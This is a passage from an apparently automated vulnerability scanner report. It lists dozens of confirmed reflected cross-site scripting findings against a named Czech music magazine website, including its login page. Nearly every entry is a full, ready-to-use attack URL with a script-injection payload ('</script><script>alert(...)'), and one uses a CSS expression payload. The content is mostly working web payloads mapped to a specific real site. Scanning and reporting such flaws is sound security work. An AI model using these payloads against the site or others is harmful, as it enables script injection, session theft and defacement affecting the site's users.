683. URL: http://www.rockandpop.cz/live/?'"--></style></script><script>alert(0x00011E)</script>
684. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
685. Parameter Name: Query Based
686. Parameter Type: FullQueryString
687. Attack Pattern: '"--></style></script><script>alert(0x00011E)</script>
688.  
689. ImpactSeverity: Important
690. Confirmation: Confirmed
691. URL: http://www.rockandpop.cz/clanky/?'"--></style></script><script>alert(0x00011F)</script>
692. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
693. Parameter Name: Query Based
694. Parameter Type: FullQueryString
695. Attack Pattern: '"--></style></script><script>alert(0x00011F)</script>
696.  
697. Severity: Important
698. Confirmation: Confirmed
699. URL: http://www.rockandpop.cz/casopis/?'"--></style></script><script>alert(0x000123)</script>
700. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
701. Parameter Name: Query Based
702. Parameter Type: FullQueryString
703. Attack Pattern: '"--></style></script><script>alert(0x000123)</script>
704.  
705. Severity: Important
706. Confirmation: Confirmed
707. URL: http://www.rockandpop.cz/video/?'"--></style></script><script>alert(0x000125)</script>
708. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
709. Parameter Name: Query Based
710. Parameter Type: FullQueryString
711. Attack Pattern: '"--></style></script><script>alert(0x000125)</script>
712.  
713. Severity: Important
714. Confirmation: Confirmed
715. URL: http://www.rockandpop.cz/recenze/?'"--></style></script><script>alert(0x000128)</script>
716. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
717. Parameter Name: Query Based
718. Parameter Type: FullQueryString
719. Attack Pattern: '"--></style></script><script>alert(0x000128)</script>
720.  
721. Severity: Important
722. Confirmation: Confirmed
723. URL: http://www.rockandpop.cz/redakce/?'"--></style></script><script>alert(0x000134)</script>
724. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
725. Parameter Name: Query Based
726. Parameter Type: FullQueryString
727. Attack Pattern: '"--></style></script><script>alert(0x000134)</script>
728.  
729. Severity: Important
730. Confirmation: Confirmed
731. URL: http://www.rockandpop.cz/zpravy/zahranicni/?'"--></style></script><script>alert(0x000142)</script>
732. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
733. Parameter Name: Query Based
734. Parameter Type: FullQueryString
735. Attack Pattern: '"--></style></script><script>alert(0x000142)</script>
736.  
737. Severity: Important
738. Confirmation: Confirmed
739. URL : http://www.rockandpop.cz/zpravy/zahranicni/your-demise-pripiji-na-nezavislost-s-novym-ohromujicim-ep/?'"--></style></script><script>alert(0x000168)</script>
740. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
741. Parameter Name: Query Based
742. Parameter Type: FullQueryString
743. Attack Pattern: '"--></style></script><script>alert(0x000168)</script>
744.  
745. ImpactSeverity: Important
746. Confirmation: Confirmed
747. Detection Accuracy :
748. URL: http://www.rockandpop.cz/zpravy/zahranicni/metallica-se-rozpovidala-o-planovanem-3d-filmu/?'"--></style></script><script>alert(0x0001D1)</script>
749. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
750. Parameter Name: Query Based
751. Parameter Type: FullQueryString
752. Attack Pattern: '"--></style></script><script>alert(0x0001D1)</script>
753.  
754. Severity: Important
755. Confirmation: Confirmed
756. URL: http://www.rockandpop.cz/zpravy/domaci/?'"--></style></script><script>alert(0x0001DE)</script>
757. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
758. Parameter Name: Query Based
759. Parameter Type: FullQueryString
760. Attack Pattern: '"--></style></script><script>alert(0x0001DE)</script>
761.  
762. Severity: Important
763. Confirmation: Confirmed
764. URL: http://www.rockandpop.cz/zpravy/zahranicni/my-bloody-valentine-zverejnili-po-22-letech-treti-desku/?'"--></style></script><script>alert(0x0001CE)</script>
765. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
766. Parameter Name: Query Based
767. Parameter Type: FullQueryString
768. Attack Pattern: '"--></style></script><script>alert(0x0001CE)</script>
769.  
770. Severity: Important
771. Confirmation: Confirmed
772. URL: http://www.rockandpop.cz/zpravy/domaci/system-of-a-down-vystoupi-v-praze/?'"--></style></script><script>alert(0x0001CB)</script>
773. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
774. Parameter Name: Query Based
775. Parameter Type: FullQueryString
776. Attack Pattern: '"--></style></script><script>alert(0x0001CB)</script>
777.  
778. Severity: Important
779. Confirmation: Confirmed
780. URL: http://www.rockandpop.cz/zpravy/zahranicni/randy-blythe:-spravne-veci-se-nemohu-otocit-zady/?'"--></style></script><script>alert(0x0001F6)</script>
781. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
782. Parameter Name: Query Based
783. Parameter Type: FullQueryString
784. Attack Pattern: '"--></style></script><script>alert(0x0001F6)</script>
785.  
786. Severity: Important
787. Confirmation: Confirmed
788. URL: http://www.rockandpop.cz/zpravy/domaci/soutez-o-2x2-vstupenky-na-koncert-slobodne-europy-v-praze/?'"--></style></script><script>alert(0x0001F3)</script>
789. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
790. Parameter Name: Query Based
791. Parameter Type: FullQueryString
792. Attack Pattern: '"--></style></script><script>alert(0x0001F3)</script>
793.  
794. Severity: Important
795. Confirmation: Confirmed
796. URL: http://www.rockandpop.cz/zpravy/zahranicni/stone-sour-predstavuji-novou-skladbu/?'"--></style></script><script>alert(0x000219)</script>
797. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
798. Parameter Name: Query Based
799. Parameter Type: FullQueryString
800. Attack Pattern: '"--></style></script><script>alert(0x000219)</script>
801.  
802. Severity: Important
803. Confirmation: Confirmed
804. URL: http://www.rockandpop.cz/zpravy/domaci/stante-se-soucasti-rubriky-usi-s-asking-alexandria-a-while-she-sleeps/?'"--></style></script><script>alert(0x00021A)</script>
805. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
806. Parameter Name: Query Based
807. Parameter Type: FullQueryString
808. Attack Pattern: '"--></style></script><script>alert(0x00021A)</script>
809.  
810. Severity: Important
811. Confirmation: Confirmed
812. URL: http://www.rockandpop.cz/zpravy/domaci/vyhrajte-2x2-vstupenky-na-ostravsky-koncert-uk-subs-a-tv-smithe/?'"--></style></script><script>alert(0x00021B)</script>
813. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
814. Parameter Name: Query Based
815. Parameter Type: FullQueryString
816. Attack Pattern: '"--></style></script><script>alert(0x00021B)</script>
817.  
818. Severity: Important
819. Confirmation: Confirmed
820. URL: http://www.rockandpop.cz/zpravy/domaci/koncem-mesice-vyda-vydavatelstvi-emi-jedinecne-album-soliteri/?'"--></style></script><script>alert(0x000273)</script>
821. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
822. Parameter Name: Query Based
823. Parameter Type: FullQueryString
824. Attack Pattern: '"--></style></script><script>alert(0x000273)</script>
825.  
826. Severity: Important
827. Confirmation: Confirmed
828. URL: http://www.rockandpop.cz/zpravy/domaci/chiki-liki-tu-a:-1000-koncertov-15-krajin-a-230-miest/?'"--></style></script><script>alert(0x00026A)</script>
829. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
830. Parameter Name: Query Based
831. Parameter Type: FullQueryString
832. Attack Pattern: '"--></style></script><script>alert(0x00026A)</script>
833.  
834. Severity: Important
835. Confirmation: Confirmed
836. URL: http://www.rockandpop.cz/zpravy/zahranicni/marilyn-manson-zkolaboval-v-prubehu-koncertu/?'"--></style></script><script>alert(0x000286)</script>
837. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
838. Parameter Name: Query Based
839. Parameter Type: FullQueryString
840. Attack Pattern: '"--></style></script><script>alert(0x000286)</script>
841.  
842. ImpactSeverity: Important
843. Confirmation: Confirmed
844. URL: http://www.rockandpop.cz/zpravy/domaci/prazsky-vyber-zverejnil-jmena-hostu-jarniho-turne/?'"--></style></script><script>alert(0x000282)</script>
845. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
846. Parameter Name: Query Based
847. Parameter Type: FullQueryString
848. Attack Pattern: '"--></style></script><script>alert(0x000282)</script>
849.  
850. Severity: Important
851. Confirmation: Confirmed
852. URL: http://www.rockandpop.cz/zpravy/zahranicni/poznejte-obycejny-den-na-turne-prostrednictvim-noveho-videoklipu-the-ghost-inside/?'"--></style></script><script>alert(0x000292)</script>
853. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
854. Parameter Name: Query Based
855. Parameter Type: FullQueryString
856.  
857. Severity: Important
858. Confirmation: Confirmed
859. URL: http://www.rockandpop.cz/zpravy/domaci/monkey-business-vydaji-nove-album-a-vyjedou-na-turne/?'"--></style></script><script>alert(0x0002B7)</script>
860. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
861. Parameter Name: Query Based
862. Parameter Type: FullQueryString
863. Attack Pattern: '"--></style></script><script>alert(0x0002B7)</script>
864.  
865. Severity: Important
866. Confirmation: Confirmed
867. URL: http://www.rockandpop.cz/zpravy/domaci/britska-zpevacka-jessie-ware-se-tesi-na-evropske-turne/?'"--></style></script><script>alert(0x0002A9)</script>
868. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
869. Parameter Name: Query Based
870. Parameter Type: FullQueryString
871. Attack Pattern: '"--></style></script><script>alert(0x0002A9)</script>
872.  
873. Severity: Important
874. Confirmation: Confirmed
875. Detection Accuracy :
876. URL: http://www.rockandpop.cz/zpravy/domaci/o5-a-radecek-opici-turne-zacne-koncertem-v-primem-prenosu/?'"--></style></script><script>alert(0x0002B8)</script>
877. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
878. Parameter Name: Query Based
879. Parameter Type: FullQueryString
880. Attack Pattern: '"--></style></script><script>alert(0x0002B8)</script>
881.  
882. Severity: Important
883. Confirmation: Confirmed
884. URL: http://www.rockandpop.cz/zpravy/zahranicni/americti-confide-se-hlasi-ze-studia-a-pridavaji-ochutnavku/?'"--></style></script><script>alert(0x0002C8)</script>
885. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
886. Parameter Name: Query Based
887. Parameter Type: FullQueryString
888. Attack Pattern: '"--></style></script><script>alert(0x0002C8)</script>
889.  
890. Severity: Important
891. Confirmation: Confirmed
892. URL: http://www.rockandpop.cz/zpravy/zahranicni/bruno-mars-predstavuje-klip-k-singlu-when-i-was-your-man/?'"--></style></script><script>alert(0x0002D4)</script>
893. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
894. Parameter Name: Query Based
895. Parameter Type: FullQueryString
896. Attack Pattern: '"--></style></script><script>alert(0x0002D4)</script>
897.  
898. Severity: Important
899. Confirmation: Confirmed
900. URL: http://www.rockandpop.cz/live/young-guns-your-demise-criminal-colection-9-11-rock-cafe-praha/?'"--></style></script><script>alert(0x00031F)</script>
901. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
902. Parameter Name: Query Based
903. Parameter Type: FullQueryString
904. Attack Pattern: '"--></style></script><script>alert(0x00031F)</script>
905.  
906. Severity: Important
907. Confirmation: Confirmed
908. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/?'"--></style></script><script>alert(0x000352)</script>
909. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
910. Parameter Name: Query Based
911. Parameter Type: FullQueryString
912. Attack Pattern: '"--></style></script><script>alert(0x000352)</script>
913.  
914. Severity: Important
915. Confirmation: Confirmed
916. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/tribal-theory-funky-rock-n-roll-ze-zapadnich-cech/?'"--></style></script><script>alert(0x000360)</script>
917. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
918. Parameter Name: Query Based
919. Parameter Type: FullQueryString
920. Attack Pattern: '"--></style></script><script>alert(0x000360)</script>
921.  
922. Severity: Important
923. Confirmation: Confirmed
924. URL: http://www.rockandpop.cz/video/rock-pop-tv-jiz-brzy/?'"--></style></script><script>alert(0x000387)</script>
925. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
926. Parameter Name: Query Based
927. Parameter Type: FullQueryString
928. Attack Pattern: '"--></style></script><script>alert(0x000387)</script>
929.  
930. Severity: Important
931. Confirmation: Confirmed
932. URL: http://www.rockandpop.cz/clanky/mlada-krev-rock-pop/overhype-nadejna-kapela-z-brna/?'"--></style></script><script>alert(0x000374)</script>
933. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
934. Parameter Name: Query Based
935. Parameter Type: FullQueryString
936. Attack Pattern: '"--></style></script><script>alert(0x000374)</script>
937.  
938. Severity: Important
939. Confirmation: Confirmed
940. URL: http://www.rockandpop.cz/video/branit-ve-cteni-casopisu-rock-pop-se-nevyplaci/?'"--></style></script><script>alert(0x0003B5)</script>
941. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
942. Parameter Name: Query Based
943. Parameter Type: FullQueryString
944. Attack Pattern: '"--></style></script><script>alert(0x0003B5)</script>
945.  
946. Severity: Important
947. Confirmation: Confirmed
948. URL: http://www.rockandpop.cz/recenze/green-day-uno-dos-tre/?'"--></style></script><script>alert(0x0003E7)</script>
949. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
950. Parameter Name: Query Based
951. Parameter Type: FullQueryString
952. Attack Pattern: '"--></style></script><script>alert(0x0003E7)</script>
953.  
954. Severity: Important
955. Confirmation: Confirmed
956. URL: http://www.rockandpop.cz/video/20-narozeniny-s-rock-pop-a-imodium/?'"--></style></script><script>alert(0x0003D5)</script>
957. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
958. Parameter Name: Query Based
959. Parameter Type: FullQueryString
960. Attack Pattern: '"--></style></script><script>alert(0x0003D5)</script>
961.  
962. Severity: Important
963. Confirmation: Confirmed
964. URL: http://www.rockandpop.cz/clanky/rozhovory/?'"--></style></script><script>alert(0x0003F3)</script>
965. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
966. Parameter Name: Query Based
967. Parameter Type: FullQueryString
968. Attack Pattern: '"--></style></script><script>alert(0x0003F3)</script>
969.  
970. Severity: Important
971. Confirmation: Confirmed
972. URL: http://www.rockandpop.cz/recenze/blink-182-dogs-eating-dogs/?'"--></style></script><script>alert(0x0003E1)</script>
973. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
974. Parameter Name: Query Based
975. Parameter Type: FullQueryString
976. Attack Pattern: '"--></style></script><script>alert(0x0003E1)</script>
977.  
978. Severity: Important
979. Confirmation: Confirmed
980. URL: http://www.rockandpop.cz/recenze/tribal-theory-call-me-closer/?'"--></style></script><script>alert(0x0003ED)</script>
981. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
982. Parameter Name: Query Based
983. Parameter Type: FullQueryString
984. Attack Pattern: '"--></style></script><script>alert(0x0003ED)</script>
985.  
986. Severity: Important
987. Confirmation: Confirmed
988. URL: http://www.rockandpop.cz/clanky/rozhovory/paul-banks:-ztotoznuji-se-s-pristupem-davida-lynche/?'"--></style></script><script>alert(0x000404)</script>
989. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
990. Parameter Name: Query Based
991. Parameter Type: FullQueryString
992. Attack Pattern: '"--></style></script><script>alert(0x000404)</script>
993.  
994. Severity: Important
995. Confirmation: Confirmed
996. URL: http://www.rockandpop.cz/clanky/rozhovory/honza-homola-wohnout-:-muzika-z-kuchyne-i-zvuky-z-kozojedske-zahrady-a-orientu/?'"--></style></script><script>alert(0x000426)</script>
997. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
998. Parameter Name: Query Based
999. Parameter Type: FullQueryString
1000. Attack Pattern: '"--></style></script><script>alert(0x000426)</script>
1001.  
1002. Severity: Important
1003. Confirmation: Confirmed
1004. URL: http://www.rockandpop.cz/clanky/tashi-tomas-erml/?'"--></style></script><script>alert(0x000463)</script>
1005. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1006. Parameter Name: Query Based
1007. Parameter Type: FullQueryString
1008. Attack Pattern: '"--></style></script><script>alert(0x000463)</script>
1009.  
1010. Severity: Important
1011. Confirmation: Confirmed
1012. URL: http://www.rockandpop.cz/clanky/jak-to-slysi-parkway-drive/?'"--></style></script><script>alert(0x00044C)</script>
1013. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1014. Parameter Name: Query Based
1015. Parameter Type: FullQueryString
1016. Attack Pattern: '"--></style></script><script>alert(0x00044C)</script>
1017.  
1018. Severity: Important
1019. Confirmation: Confirmed
1020. URL: http://www.rockandpop.cz/live/akce/7526-cena-hudebnich-kritiku-apollo-2012-sasazu-praha-6-2-2013/?'"--></style></script><script>alert(0x000483)</script>
1021. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1022. Parameter Name: Query Based
1023. Parameter Type: FullQueryString
1024. Attack Pattern: '"--></style></script><script>alert(0x000483)</script>
1025.  
1026. Severity: Important
1027. Confirmation: Confirmed
1028. URL: http://www.rockandpop.cz/live/muj-report/?'"--></style></script><script>alert(0x00048B)</script>
1029. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1030. Parameter Name: Query Based
1031. Parameter Type: FullQueryString
1032. Attack Pattern: '"--></style></script><script>alert(0x00048B)</script>
1033.  
1034. Severity: Important
1035. Confirmation: Confirmed
1036. URL: http://www.rockandpop.cz/fotky/?'"--></style></script><script>alert(0x000493)</script>
1037. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1038. Parameter Name: Query Based
1039. Parameter Type: FullQueryString
1040. Attack Pattern: '"--></style></script><script>alert(0x000493)</script>
1041.  
1042. Severity: Important
1043. Confirmation: Confirmed
1044. URL: http://www.rockandpop.cz/fotky/upload/?'"--></style></script><script>alert(0x000499)</script>
1045. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1046. Parameter Name: Query Based
1047. Parameter Type: FullQueryString
1048. Attack Pattern: '"--></style></script><script>alert(0x000499)</script>
1049.  
1050. Severity: Important
1051. Confirmation: Confirmed
1052. URL: http://www.rockandpop.cz/live/akce/7032-parkway-drive-predvedli-v-praze-australskou-saunu/?'"--></style></script><script>alert(0x0004C0)</script>
1053. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1054. Parameter Name: Query Based
1055. Parameter Type: FullQueryString
1056. Attack Pattern: '"--></style></script><script>alert(0x0004C0)</script>
1057.  
1058. Severity: Important
1059. Confirmation: Confirmed
1060. URL: http://www.rockandpop.cz/live/akce/?'"--></style></script><script>alert(0x0004C2)</script>
1061. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1062. Parameter Name: Query Based
1063. Parameter Type: FullQueryString
1064. Attack Pattern: '"--></style></script><script>alert(0x0004C2)</script>
1065.  
1066. Severity: Important
1067. Confirmation: Confirmed
1068. URL: http://www.rockandpop.cz/live/akce/6935-muse-everything-everything-22-11-2012-praha-o2-arena/?'"--></style></script><script>alert(0x000502)</script>
1069. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1070. Parameter Name: Query Based
1071. Parameter Type: FullQueryString
1072. Attack Pattern: '"--></style></script><script>alert(0x000502)</script>
1073.  
1074. Severity: Important
1075. Confirmation: Confirmed
1076. URL: http://www.rockandpop.cz/live/akce/6909-into-darkness-tour-2012/?'"--></style></script><script>alert(0x00050A)</script>
1077. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1078. Parameter Name: Query Based
1079. Parameter Type: FullQueryString
1080. Attack Pattern: '"--></style></script><script>alert(0x00050A)</script>
1081.  
1082. Severity: Important
1083. Confirmation: Confirmed
1084. URL: http://www.rockandpop.cz/live/akce/6566-serj-tankian-rozeskakal-lucernu/?'"--></style></script><script>alert(0x000511)</script>
1085. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1086. Parameter Name: Query Based
1087. Parameter Type: FullQueryString
1088. Attack Pattern: '"--></style></script><script>alert(0x000511)</script>
1089.  
1090. Severity: Important
1091. Confirmation: Confirmed
1092. URL: http://www.rockandpop.cz/live/akce/6564-niceland-michal-hruza-kapela-hruzy-andel-music-bar-plzen-24-10-2012/?'"--></style></script><script>alert(0x000520)</script>
1093. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1094. Parameter Name: Query Based
1095. Parameter Type: FullQueryString
1096. Attack Pattern: '"--></style></script><script>alert(0x000520)</script>
1097.  
1098. ImpactSeverity: Important
1099. Confirmation: Confirmed
1100. URL: http://www.rockandpop.cz/live/akce/6545-fotky-z-koncertu-lionela-richieho/?'"--></style></script><script>alert(0x00052C)</script>
1101. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1102. Parameter Name: Query Based
1103. Parameter Type: FullQueryString
1104. Attack Pattern: '"--></style></script><script>alert(0x00052C)</script>
1105.  
1106. Severity: Important
1107. Confirmation: Confirmed
1108. URL: http://www.rockandpop.cz/zpravy/festivaly/?'"--></style></script><script>alert(0x00052E)</script>
1109. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1110. Parameter Name: Query Based
1111. Parameter Type: FullQueryString
1112. Attack Pattern: '"--></style></script><script>alert(0x00052E)</script>
1113.  
1114. Severity: Important
1115. Confirmation: Confirmed
1116. URL: http://www.rockandpop.cz/zpravy/festivaly/2012/?'"--></style></script><script>alert(0x000533)</script>
1117. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1118. Parameter Name: Query Based
1119. Parameter Type: FullQueryString
1120. Attack Pattern: '"--></style></script><script>alert(0x000533)</script>
1121.  
1122. Severity: Important
1123. Confirmation: Confirmed
1124. URL: http://www.rockandpop.cz/casopis/rock-pop-2-13/?'"--></style></script><script>alert(0x00053C)</script>
1125. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1126. Parameter Name: Query Based
1127. Parameter Type: FullQueryString
1128. Attack Pattern: '"--></style></script><script>alert(0x00053C)</script>
1129.  
1130. Severity: Important
1131. Confirmation: Confirmed
1132. URL: http://www.rockandpop.cz/mapa-stranek/?'"--></style></script><script>alert(0x000546)</script>
1133. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1134. Parameter Name: Query Based
1135. Parameter Type: FullQueryString
1136. Attack Pattern: '"--></style></script><script>alert(0x000546)</script>
1137.  
1138. Severity: Important
1139. Confirmation: Confirmed
1140. URL: http://www.rockandpop.cz/newsletter/?'"--></style></script><script>alert(0x00055A)</script>
1141. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1142. Parameter Name: Query Based
1143. Parameter Type: FullQueryString
1144. Attack Pattern: '"--></style></script><script>alert(0x00055A)</script>
1145.  
1146. Severity: Important
1147. Confirmation: Confirmed
1148. URL: http://www.rockandpop.cz/hledani/?'"--></style></script><script>alert(0x00058C)</script>
1149. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1150. Parameter Name: Query Based
1151. Parameter Type: FullQueryString
1152. Attack Pattern: '"--></style></script><script>alert(0x00058C)</script>
1153.  
1154. Severity: Important
1155. Confirmation: Confirmed
1156. URL: http://www.rockandpop.cz/hledani/
1157. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1158. Parameter Name: q
1159. Parameter Type: Post
1160. Attack Pattern: '"--></style></script><script>alert(0x000590)</script>
1161.  
1162. Severity: Important
1163. Confirmation: Confirmed
1164. URL: http://www.rockandpop.cz/zpravy/zahranicni/silverstein-lakaji-svym-nejnovejsim-videoklipem-na-aktualni-desku/?'"--></style></script><script>alert(0x0005B0)</script>
1165. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1166. Parameter Name: Query Based
1167. Parameter Type: FullQueryString
1168. Attack Pattern: '"--></style></script><script>alert(0x0005B0)</script>
1169.  
1170. Severity: Important
1171. Confirmation: Confirmed
1172. URL: http://www.rockandpop.cz/zpravy/domaci/cenu-hudebnich-kritiku-apollo-2012-ziskal-boris-carloff/?'"--></style></script><script>alert(0x0005B4)</script>
1173. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1174. Parameter Name: Query Based
1175. Parameter Type: FullQueryString
1176. Attack Pattern: '"--></style></script><script>alert(0x0005B4)</script>
1177.  
1178. Severity: Important
1179. Confirmation: Confirmed
1180. URL: http://www.rockandpop.cz/zpravy/zahranicni/p-nk-predstavuje-novy-videoklip-s-hvezdnym-hostem/?'"--></style></script><script>alert(0x0005B3)</script>
1181. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1182. Parameter Name: Query Based
1183. Parameter Type: FullQueryString
1184. Attack Pattern: '"--></style></script><script>alert(0x0005B3)</script>
1185.  
1186. Severity: Important
1187. Confirmation: Confirmed
1188. URL: http://www.rockandpop.cz/zpravy/?page='"--></style></script><script>alert(0x0005E2)</script>
1189. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1190. Parameter Name: page
1191. Parameter Type: Querystring
1192. Attack Pattern: '"--></style></script><script>alert(0x0005E2)</script>
1193.  
1194. Severity: Important
1195. Confirmation: Confirmed
1196. URL: http://www.rockandpop.cz/underwood/login.php/" stYle="x:expre/**/ssion(alert(9))
1197. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1198. Parameter Name: URI-BASED
1199. Parameter Type: RawUrlInjection
1200. Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))
1201.  
1202. Severity: Important
1203. Confirmation: Confirmed
1204. URL: http://www.rockandpop.cz/underwood/login.php?request='"--></style></script><script>alert(0x000602)</script>
1205. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1206. Parameter Name: request
1207. Parameter Type: Querystring
1208. Attack Pattern: '"--></style></script><script>alert(0x000602)</script>
1209.  
1210. Severity: Important
1211. Confirmation: Confirmed
1212. URL: http://www.rockandpop.cz/zpravy/domaci/jarni-turne-the-prostitutes-zavrsi-rok-od-vydani-uspesneho-alba/?'"--></style></script><script>alert(0x00060C)</script>
1213. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1214. Parameter Name: Query Based
1215. Parameter Type: FullQueryString
1216. Attack Pattern: '"--></style></script><script>alert(0x00060C)</script>
1217.  
1218. Severity: Important
1219. Confirmation: Confirmed
1220. URL: http://www.rockandpop.cz/zpravy/zahranicni/nove-video-in-due-time-od-killswitch-engage/?'"--></style></script><script>alert(0x00060D)</script>
1221. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1222. Parameter Name: Query Based
1223. Parameter Type: FullQueryString
1224. Attack Pattern: '"--></style></script><script>alert(0x00060D)</script>
1225.  
1226. Severity: Important
1227. Confirmation: Confirmed
1228. URL: http://www.rockandpop.cz/zpravy/tiskove-zpravy/?'"--></style></script><script>alert(0x000640)</script>
1229. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1230. Parameter Name: Query Based
1231. Parameter Type: FullQueryString
1232. Attack Pattern: '"--></style></script><script>alert(0x000640)</script>
1233.  
1234. Severity: Important
1235. Confirmation: Confirmed
1236. URL: http://www.rockandpop.cz/zpravy/hledani/?'"--></style></script><script>alert(0x000657)</script>
1237. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1238. Parameter Name: Query Based
1239. Parameter Type: FullQueryString
1240. Attack Pattern: '"--></style></script><script>alert(0x000657)</script>
1241.  
1242. Severity: Important
1243. Confirmation: Confirmed
1244. URL: http://www.rockandpop.cz/recenze/stone-sour-house-of-gold-bones-pt-1/?'"--></style></script><script>alert(0x0006F1)</script>
1245. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1246. Parameter Name: Query Based
1247. Parameter Type: FullQueryString
1248. Attack Pattern: '"--></style></script><script>alert(0x0006F1)</script>
1249.  
1250. Severity: Important
1251. Confirmation: Confirmed
1252. URL: http://www.rockandpop.cz/underwood/login.php?request='"--></style></script><script>alert(0x0006F0)</script>&uwLanguage=cz
1253. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
1254. Parameter Name: request
1255. Parameter Type: Querystring
1256. Attack Pattern: '"--></style></script><script>alert(0x0006F0)</script>
1257.  
1258. Severity: Important
1259. Confirmation: Confirmed
1260. URL: http://www.rockandpop.cz/recenze/sister-sin-now-and-forever/?'"--></style></script><script>alert(0x0006F2)</script>
